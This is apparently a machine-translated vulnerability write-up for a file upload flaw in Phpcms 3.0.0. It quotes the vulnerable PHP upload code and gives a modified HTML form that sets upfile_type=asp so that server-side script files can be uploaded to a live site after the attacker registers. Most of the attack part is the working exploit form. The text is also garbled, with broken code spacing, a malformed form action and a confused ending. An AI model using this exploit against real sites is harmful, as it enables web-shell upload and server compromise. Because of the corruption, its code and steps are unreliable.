Phpcms 3.0.0 File Upload Vulnerability

Vulnerability files: ads/upload. php and uppic. php

The Code is as follows:

Require "common. php ";
Require PHPCMS_ROOT. "/class/upload. php ";

If (! $ _ Userid) message ("Please log on or register first! ", PHPCMS_PATH." member/login. php ");

If ($ extid = 1 ){
$ Upfile_type = "jpg | png | gif ";
} Elseif ($ extid = 2 ){
$ Upfile_type = "swf ";
}

If ($ action = upload)
{
$ FileArr = array (
File => $ previusfile,
Name => $ previusfile_name,
Size => $ previusfile_size,
Type => $ previusfile_type
);

$ Showname = $ fileArr [name];
$ Tmpext = strtolower (fileext ($ showname ));
$ Tmpfilesize = $ fileArr [size];
$ Savepath = ads/. $ upfile_dir./. date (Ym );
$ F-> create (PHPCMS_ROOT. "/". $ savepath );
$ Up = new upload ($ fileArr, $ savepath, $ upfile_type, 1, $ upfile_size );
...........

Obviously, the upfile_type variable is not strictly filtered. You can customize the upload type. In practice, you can upload files with any suffix except *. php and *. php3,
Because the PHPCMS_ROOT. "/class/upload. php" file is Zend encrypted, direct analysis is not possible.

If (! $ _ Userid) message ("Please log on or register first! ", PHPCMS_PATH." member/login. php ");

$ _ Userid is obtained by session. Therefore, register a user and use the vulnerability after logon. The modified upload page is as follows:

<Html>
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">
<Title> upload </title>
<Meta name = "keywords" content = "">
<Meta name = "description" content = "">
<Meta name = "generator" content = "Phpcms">
<Link href = "/templates/default/skins/default/style.css" rel = "stylesheet" type = "text/css">
</Head>

<Body>
<Script language = "javascript" type = "text/javascript">
<! --
Function checkform ()
{
If (document. getElementById ("previusfile"). value =) {alert ("select the file to upload! "); Return false ;}
}
// -->
</Script>
<Table cellpadding = "0" cellspacing = "0" border = "0" width = "100%" height = "5">
<Tr>

<Td> </td>
</Tr>
</Table>
<Form name = "upload" method = "post"
Action = "asp"> http://www.phpcms.cn/ads/upload.php? Action = upload & url = & upfile_type = asp "enctype =" multipart/form-data "onSubmit =" return checkform (); ">
<Table cellpadding = "2" cellspacing = "1" class = "tableborder">
<Tr>
<Th> File Upload </th>
</Tr>
<Tr>
<Td class = "tablerow" height = "30">
Select: <input name = "previusfile" type = "file" id = "previusfile" size = "20"/>

<Input type = "hidden" name = "MAX_FILE_SIZE" value = ""/>
<Input type = "hidden" name = "channelid" value = "0"/>
<Input type = "submit" name = "submit" value = "Upload">
</Td>
</Tr>
</Table>
</Form>

</Body>
</Html>

Now you can upload the asp file. open the file (save session) in the login window. the uploaded file name suffix is the same as the upfile_type variable of the action attribute in the form, the source code of the uploaded page is as follows:

According to the above local modification, the upload is in an incorrect format?